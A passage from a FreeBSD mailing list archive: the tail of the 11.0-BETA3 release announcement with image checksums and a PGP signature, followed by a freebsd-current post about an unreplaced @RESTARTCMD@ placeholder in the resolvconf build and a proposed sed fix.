bcb8d628e57d76e38c3f20df88a5a6e056ee4d52845e6d22b4e61f97122f9b78ec86be58c15ee6eddd1eb82c8eebde948fcb81ec5a33c42e1b1c6529897a3051 SHA512 (FreeBSD-11.0-BETA3-sparc64-disc1.iso) = d937c726de481f7b7f813518fde18bdb612fa0d29d6893040454435fe358dc55957345bfcdc2973472e8309178dd761393efc4e85b2d94f29e2bc57dacaee959 SHA512 (FreeBSD-11.0-BETA3-sparc64-disc1.iso.xz) = 222abe0bd34aaf070d904a9457e7aa039f1449157415ad44780c672563246f737f3e1174383b7c5f567b2bdce9852a89996dd74d85ff2e7221a3d9a6b69b1f98 SHA256 (FreeBSD-11.0-BETA3-sparc64-bootonly.iso) = ad3e4176c9cb25924f5abf1e48506919ce1f93c9149585338398e3ea16c6795a SHA256 (FreeBSD-11.0-BETA3-sparc64-bootonly.iso.xz) = d86f1623b630e2afc1b77039ae1d9a51d7a2ee01e762155f1386094f0291a9ba SHA256 (FreeBSD-11.0-BETA3-sparc64-disc1.iso) = 24139c765ffa0be2a9469560e028b40209e88465319deb5c543c1904730753bd SHA256 (FreeBSD-11.0-BETA3-sparc64-disc1.iso.xz) = a37601b693f93071de534b25691ebb1f62eb036e3efc54c5dbcd57bd4d0dda06 o 11.0-BETA3 armv6 BANANAPI: SHA512 (FreeBSD-11.0-BETA3-arm-armv6-BANANAPI.img.xz) = 32115500ebb5b456b62743410def57d08a03b15c58e1b364e1183cf480b0bc5cda021da5c4921fe3fb561c3a04b28d4b93f4a97aeefad8ad9da834929c4f7362 SHA256 (FreeBSD-11.0-BETA3-arm-armv6-BANANAPI.img.xz) = 785284194f57d5f955322a8d9be2e1b3f3c9f14ce53033cee722ff203e6af21b o 11.0-BETA3 armv6 BEAGLEBONE: SHA512 (FreeBSD-11.0-BETA3-arm-armv6-BEAGLEBONE.img.xz) = 05fbd732754cd6585e59a323c893a241195b58fa80e993136fe16f5aa870680c3c28756c97221ca2c5f9d1cb264686fa9368dd5b93fe98282ca6759997291859 SHA256 (FreeBSD-11.0-BETA3-arm-armv6-BEAGLEBONE.img.xz) = 2c87decbef7c244cde030105caef69399a92954d50bbf41bbb811fc79150f2a3 o 11.0-BETA3 armv6 CUBIEBOARD: SHA512 (FreeBSD-11.0-BETA3-arm-armv6-CUBIEBOARD.img.xz) = 729f0ac6e3d741a89af026d67ecaab11a8b9e34f67a2d2f74ec0c03224d4c7957880d9a470b8623cdeb56430a78a7512ec02c5658724efc8188de396643623ca SHA256 (FreeBSD-11.0-BETA3-arm-armv6-CUBIEBOARD.img.xz) = 7bdb5eefdc76e4cc6067fbac4f8724c24a8864330989dae532fe4abe0f48cd2e o 11.0-BETA3 armv6 CUBIEBOARD2: SHA512 (FreeBSD-11.0-BETA3-arm-armv6-CUBIEBOARD2.img.xz) = e6c8ce08a384f3c23666b655747c54df4a5cbf1144ba53023b1ae6cd2cd124ac1a4919f332ce62147d976488605ccda48540892feedadebb9562e299b24964aa SHA256 (FreeBSD-11.0-BETA3-arm-armv6-CUBIEBOARD2.img.xz) = b20050e767ead74620ead89d6515f10a8460d34cfbb3dcc14cc8d5db9d019881 o 11.0-BETA3 armv6 CUBOX-HUMMINGBOARD: SHA512 (FreeBSD-11.0-BETA3-arm-armv6-CUBOX-HUMMINGBOARD.img.xz) = fa353f0844dc4918a367cd750e26c254bde977059d85bf931cce9b164e4cc17324581bce12458fdb9f091aa015183d761f78f77f213d35cc05c282e17b376226 SHA256 (FreeBSD-11.0-BETA3-arm-armv6-CUBOX-HUMMINGBOARD.img.xz) = 88aa2480d85b1160a59a2b0d3760fef724304f9663d978cba809d095b6c1b638 o 11.0-BETA3 armv6 GUMSTIX: SHA512 (FreeBSD-11.0-BETA3-arm-armv6-GUMSTIX.img.xz) = 887dc140cd9baec8d96a782835a458272a5df5fb10eaf0df79d6beea1fcdd0fd39d170df71652619cf01c6dbdd6790244fcdb4c1cbb680cb0bcfe1a424475e3c SHA256 (FreeBSD-11.0-BETA3-arm-armv6-GUMSTIX.img.xz) = 86e99a2ede481eb63b38ed9eea89000dca35841fea84d4203480a7f26b1db308 o 11.0-BETA3 armv6 RPI-B: SHA512 (FreeBSD-11.0-BETA3-arm-armv6-RPI-B.img.xz) = e671edf773003ecc3ccf76a6d87d65f281d13818fa041e3649ab772949a0a621ceb6b6a4de1b5f879b677a509b5b868fb42d405bc25c698e26f6a9f90a4eb69f SHA256 (FreeBSD-11.0-BETA3-arm-armv6-RPI-B.img.xz) = cfe299cc805233fe8e601fcf310ebff023a5d42affd8ca676b7ef6e52b30e137 o 11.0-BETA3 armv6 RPI2: SHA512 (FreeBSD-11.0-BETA3-arm-armv6-RPI2.img.xz) = bc5ac52920dbdc6be7b3ea97da4bcbe273a92e1b59fda34b9de8e2f3669a3f5ec870ce63dc8851de06584ba21a4e75eb7ceead9a9ec2ef6ed5c24a4ce5679956 SHA256 (FreeBSD-11.0-BETA3-arm-armv6-RPI2.img.xz) = 6ed5039bab5933d28a42a1c468c9664d6ba5b156b3945f2724abfd93e09193d3 o 11.0-BETA3 armv6 PANDABOARD: SHA512 (FreeBSD-11.0-BETA3-arm-armv6-PANDABOARD.img.xz) = 3cd7d89f35e2f13f142f7924e4b0ebdda26f42592d5e341c3ce771641b996a4f42606d61a6d31fe68b6721296f4cc14c5a84d28ebdbadbad5f66bd6fbb50a634 SHA256 (FreeBSD-11.0-BETA3-arm-armv6-PANDABOARD.img.xz) = d444a519af6c59d8fda6f01e4888f87f392b960283a6be5d393c35a614976af7 o 11.0-BETA3 armv6 WANDBOARD: SHA512 (FreeBSD-11.0-BETA3-arm-armv6-WANDBOARD.img.xz) = 2ca0b8608b0884cde102ba4c4fd458466383df38ca0045a19195e1fb190033a4149322264cc0b424516d9f6d2b9070c0286734bed8210eb3d39631a07ccd7407 SHA256 (FreeBSD-11.0-BETA3-arm-armv6-WANDBOARD.img.xz) = 026eadfbfe0b2c0bd363620aaef7395ed0f1184f2005d970075d47635d581da7 o 11.0-BETA3 aarch64 GENERIC: SHA512 (FreeBSD-11.0-BETA3-arm64-aarch64-memstick.img) = a476e8dab1f5603788c5d4712ab1fdd9fe737eeeba50d3d789f76f72101350f693592cf30ad6ae19c9e059328cde15052140569154bec0d2112ae08b2a4a4a71 SHA512 (FreeBSD-11.0-BETA3-arm64-aarch64-memstick.img.xz) = 5140e7b306dab00f176b709ee729585f5fae1155116b4d2e2603bbcf78782841c7225f2a8c00d52578315223ceb93d1ffcfc8d07a6e0dbd1aceaebbdf5fe9005 SHA512 (FreeBSD-11.0-BETA3-arm64-aarch64-mini-memstick.img) = 65cfc5819a25d494a78799181706cb3987f97f2f640051dae810c2f145f622a3616c9586fc83183745e0d771148bd4c30dc110c8bb6cfd7d900e86462524a564 SHA512 (FreeBSD-11.0-BETA3-arm64-aarch64-mini-memstick.img.xz) = 1185623f09994122feb04ad6b202c80542e30be12c7235cf3689170b2de6836dde3a7a8a5cd649cc59d3e34fca21a4620b24815e6147fcc92bf9dfc6736c6750 SHA256 (FreeBSD-11.0-BETA3-arm64-aarch64-memstick.img) = 6346fef8c34a673f292cafa93d48448cad1bb1dc711d6b28a9b58aabcde773f8 SHA256 (FreeBSD-11.0-BETA3-arm64-aarch64-memstick.img.xz) = 6c8e30275a4ce3efd8af17b9f548b4c2ea060e49aabb53b62305fee4eaa51e67 SHA256 (FreeBSD-11.0-BETA3-arm64-aarch64-mini-memstick.img) = f964864cfb0acce2e528b1db802d3a4a5288a10ea916241c0316c0473d5487c2 SHA256 (FreeBSD-11.0-BETA3-arm64-aarch64-mini-memstick.img.xz) = 3a8e717d9d0dcde693c0958aa6b6721719e08929c64518b58287091d2a2fdf7e == VM IMAGE CHECKSUMS == o 11.0-BETA3 amd64: SHA512 (FreeBSD-11.0-BETA3-amd64.qcow2.xz) = 1d6e0625a3694a75e0f5d6ddb35ce72af0690ab5a1c9efd691a2486c97f6c570e4de565d1374850d013550378d15f085d896caf03814cb87bb12c6d3a403a083 SHA512 (FreeBSD-11.0-BETA3-amd64.raw.xz) = e4596607c58bf82dd30ee98d164101c0e0c565705dacef3755741484dc9cd3f11005025d94ab332cf73a68239f743f629b39f4abe69c07fbcb31532f5a329bf3 SHA512 (FreeBSD-11.0-BETA3-amd64.vhd.xz) = e57ae7a6c081cf5d3ebdfb58867c4b93d616066a8b42c3ff17e0e65f96261498d8d32fbd3dfcf6982b1bb95f14d1fe408c6e48b816b744380cd983846a6dfb36 SHA512 (FreeBSD-11.0-BETA3-amd64.vmdk.xz) = 29e817b28b346009fb2028c9fa2e5dd62ed8f1a05c1b575f52b74e46530e625c32badcfcd3cb1b96f4186002898ebe6c8f75ea4d0c63ccf569f035a06955fa1b SHA256 (FreeBSD-11.0-BETA3-amd64.qcow2.xz) = 49481b828e5ab0a18097e0de430df460b3a435284ec7fbfcdc04371a480be6c9 SHA256 (FreeBSD-11.0-BETA3-amd64.raw.xz) = 172101acf0f865627bba9a723393633c181f223e5228177cc2cfc444762f0e32 SHA256 (FreeBSD-11.0-BETA3-amd64.vhd.xz) = 942982ddbdbc1a9d0411967297ec3d3e5b4d54c019924c8078924060eb37a85b SHA256 (FreeBSD-11.0-BETA3-amd64.vmdk.xz) = 49eb46c0c730a5745df3b97f3ae4378daabbf15b54e08a48ec565fda16bf85f2 o 11.0-BETA3 i386: SHA512 (FreeBSD-11.0-BETA3-i386.qcow2.xz) = cfaa96bea978565ebe7e2c65ecc79b76484736f956a3121583e7877e7d1660128a0989b6d986319635e89310a6c45ccb74b8e89a493c6ef59e2b1bfbc630fd7a SHA512 (FreeBSD-11.0-BETA3-i386.raw.xz) = 3daea5a2b70b88fd13479a8052f74ef82d4a1968e5815f4a1e31f3dd991f6c165f065f7702d36ca6a6cd67cf7f5304b626f47190a6e23772ec8974ba1dc972f5 SHA512 (FreeBSD-11.0-BETA3-i386.vhd.xz) = 805356b67bb348e993c9e5432efd903773655a1f1532f8b3d976bb2bfbbd71960e9525233a4f1dfcb5bb235b864ffd4a5a20ee374633a68c869299670aa6cf7d SHA512 (FreeBSD-11.0-BETA3-i386.vmdk.xz) = 45d8d35bed0a98d7ab70c8b74c0ac57150acb7e46f258b30e583ff89f3e460b3dd74b626bb5b5b481549cadee7f2f68f1bb899beee62480972472984fb5fa970 SHA256 (FreeBSD-11.0-BETA3-i386.qcow2.xz) = 939cfc4db6335ce562a5b410bf2ed5427fe9f5ab8266351d7338dfed270637da SHA256 (FreeBSD-11.0-BETA3-i386.raw.xz) = ad89668552eb70f99f67c0e99b152fbffdc9025b43c350987fdcc96ddca85811 SHA256 (FreeBSD-11.0-BETA3-i386.vhd.xz) = addb29839e53515c3aef215a6b675bc56373e76fd05b47b92c941301fcca5bc7 SHA256 (FreeBSD-11.0-BETA3-i386.vmdk.xz) = 067b3bcfda6249c290f899233a1379db4e8f60ffe529e6c135259dfbb2694633 o 11.0-BETA3 aarch64: SHA512 (FreeBSD-11.0-BETA3-arm64-aarch64.qcow2.xz) = 5cc16b9731156f16c7c2476b6e74feb894c4db225a4a6039e2a53b6cb57c38760bf74316fead3a850401f4c3b476b23fe3ceb86f67f8ac284af29ff40ee6af40 SHA512 (FreeBSD-11.0-BETA3-arm64-aarch64.raw.xz) = 46c0d6edac0be7eb76f1123472d57481e7cf3d4635e614d1bd9dc730176752540573af1bd413611de6af246919bb180c75982f82b0a0694e76ea8bb2388c4945 SHA512 (FreeBSD-11.0-BETA3-arm64-aarch64.vhd.xz) = a6cf98691f26a083f9a10305bc841d912e10867a76f03ae4fb9dfa0e6e013584ed2c23476d39d3438ef883cf5e90c99deca910b8cc0830d657dd9c8f3c7482a3 SHA512 (FreeBSD-11.0-BETA3-arm64-aarch64.vmdk.xz) = c927a33cd30eebe0b1c7668d77c04cf7f72bc6401b1284f804f9fb7e09bf626eca5c2f2507d5f1da292eff7ee3c42ecbc7aaa5cf87bb1bddf08f3483ae646413 SHA256 (FreeBSD-11.0-BETA3-arm64-aarch64.qcow2.xz) = 21b6cbb6867d56e20785e9f0bb337610f153f73d70e6428cef466440b8042b75 SHA256 (FreeBSD-11.0-BETA3-arm64-aarch64.raw.xz) = a4da494460bf064328eced6ceccdcb75d618dd6e2599a26a02bbe92b2e4be908 SHA256 (FreeBSD-11.0-BETA3-arm64-aarch64.vhd.xz) = 0c8b3c7ec8ff33baea3c897942bf7752a0b7ec7f0e646d9fd0b621456026d61c SHA256 (FreeBSD-11.0-BETA3-arm64-aarch64.vmdk.xz) = b9e39851acf8078da8f0f7a256b76b5b62dd516e3555b7c2f744a720ce3e840b Regards, Glen Love FreeBSD? Support this and future releases with a donation to the FreeBSD Foundation! https://www.freebsdfoundation.org/donate/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQIcBAEBCAAGBQJXnRxTAAoJEAMUWKVHj+KTrfIP/3nArXYNKPuV+dLaetDqX+wY Yom0cibUQv22FwBw8iiOjxlBTbC3oubhuSTY3KWIquioP0aMe9WTed/KQWzK8p9A TRZob0HsV8DR1WCurqUO2EAesxZbp4oRRudhOw2FwPs7iINo2eI2o8I776twSj03 k6t26nwBYphQJhxZx7fJqXqTvdkDYNcE/eUlVRZiuuaEUt+kW79QPGlrYreB8VoX W3eaYec8fprEfUQappZyWGdmSxFRxoisk+dHOjV6qEm7/ZKXuNl2T/F2QJmZ8oTZ mSyfrMXO47KdlAXbPriH2CrQf38Nt5WQzUEIwg375uVTggtJdsRB1PD9dWYFWkhg VxPdchro2NJOBEXPGvL47aF2EZBBSUPJ+s88gXXckeEhJGlqp+cja+YW9tkLlCbI pQ1Lh3+u3W9JcE/4toodGL2Xr5dDL4rgBavcQO0iSDozngTCZXuZZFrieYy0dFUM C8mzKFMcte4P1HAPGzRs6DdBFwDn806GFwclZib0eEPmD6x2DZtV4KQYicG52dgh O0QcVaEUqBsogCH8CX3WHnsthzLKNVBEZTpBsCwc8lrE3StOWq6P7fviAjFU715C vNRAq0TNK8xLbZDGL9NDqQWAKb7IOZASQ5Nanq4vTZ7q+GbEef+juWqqtubbl6w8 FjsNSKdikHivNZ4MvU0d =/g7g -----END PGP SIGNATURE----- From owner-freebsd-current@freebsd.org Sat Jul 30 22:37:38 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 171A9BA89B7 for ; Sat, 30 Jul 2016 22:37:38 +0000 (UTC) (envelope-from guyyur@gmail.com) Received: from mail-wm0-x22d.google.com (mail-wm0-x22d.google.com [IPv6:2a00:1450:400c:c09::22d]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 994141962; Sat, 30 Jul 2016 22:37:37 +0000 (UTC) (envelope-from guyyur@gmail.com) Received: by mail-wm0-x22d.google.com with SMTP id i5so195902698wmg.0; Sat, 30 Jul 2016 15:37:37 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:from:date:message-id:subject:to; bh=tylHI6O1fT7JI7id9DpwrC3Fl0jj2znNvWjFpIvflBs=; b=W5WqZ1T3rRcnFoJQQz4eRif6SAKE0W3L8fHcmuFzLqyn89itmK+v/wQDt7fUQIMsOH DvILVS9JU1LZxz4Y9Di7199EGLexbr3IDxdsfonr+mmsuRLJ9LHhUVbJxKgo0ZQm0nwL GaXpFpdLY9QLw8NfsPn0tc7bGI3LbIywDa1/NdONS9MMgMxfkaX1mC9FTj78JCciYT7z BKVFLUoCbSWu1OvuIO461lUPtUIgjeEFRF+ZINRS/y3hIogYvbmalq/b5ofVtEWe1+5G wEHqcE4pwbSb0+RbYDDXVGpnVCa82fIQyBGy8lRgDRS7D52PKN0fX5BwTEZHNikMfSZo 7mbQ== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:from:date:message-id:subject:to; bh=tylHI6O1fT7JI7id9DpwrC3Fl0jj2znNvWjFpIvflBs=; b=BRLxvqtboAi3cK9pNQhcI88mXvNNEsBtZwU9ij6VL81Z54m+WeGKST3xQWNejuEVc4 2pbVmmd9J6JMAUeMfuXy8j+sCIzJlD4T4YAtGTrTzAB1n4CMlMpaov2fz1NVdpNYdcmC kLCOCqp289U60rFB9kheVO9Y6mfF1IWNv6eWn7Ccu2j4KpLjI2nfwlmvXgu5dzQgB+Jn EbgLr4wiMBv6Cdre9ddpkxLCCir2OcUQf+EtqobBl8ocM5P5Q9UGij6EwvGXUZOwB+Fk R5FXCvQhAPSUTW22OwfpZhUlKD3rJCGuZJxnmaVp/+j9P5iT6aoUapM7FzDELR/s0gNW TDOg== X-Gm-Message-State: AEkoousXB5AjvTX8ngR2a0XMKcHJL0QKxrSPiz4UHBjXnnedEqsjHdwNtjkyvTSU2a2v0c01dz2vIeoWgnFxCw== X-Received: by 10.194.87.66 with SMTP id v2mr49197404wjz.40.1469918255576; Sat, 30 Jul 2016 15:37:35 -0700 (PDT) MIME-Version: 1.0 Received: by 10.28.19.203 with HTTP; Sat, 30 Jul 2016 15:37:34 -0700 (PDT) From: Guy Yur Date: Sun, 31 Jul 2016 01:37:34 +0300 Message-ID: Subject: resolvconf needs @RESTARTCMD@ to be replaced after r303062 To: freebsd-current , pfg@freebsd.org Content-Type: text/plain; charset=UTF-8 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 22:37:38 -0000 Hi, openresolv 3.8.1 added RESTARTCMD=@RESTARTCMD@ in contrib/openresolv/resolvconf.in. It is not replaced by the sed expressions in sbin/resolvconf/Makefile. Error seen is "eval: @RESTARTCMD@: not found". Current @RESTARTCMD \(.*\)@ sed expression needs to be kept for pdns_recursor.in and a new expression added to replace @RESTARTCMD@. The following worked for me: RESTARTCMD_= "/usr/sbin/service \\$$1 onestatus >/dev/null 2>\&1 \&\& /usr/sbin/service \\$$1 restart" sed ... \ ... \ -e 's:@RESTARTCMD@:${RESTARTCMD_}:g' \ ... Regards, Guy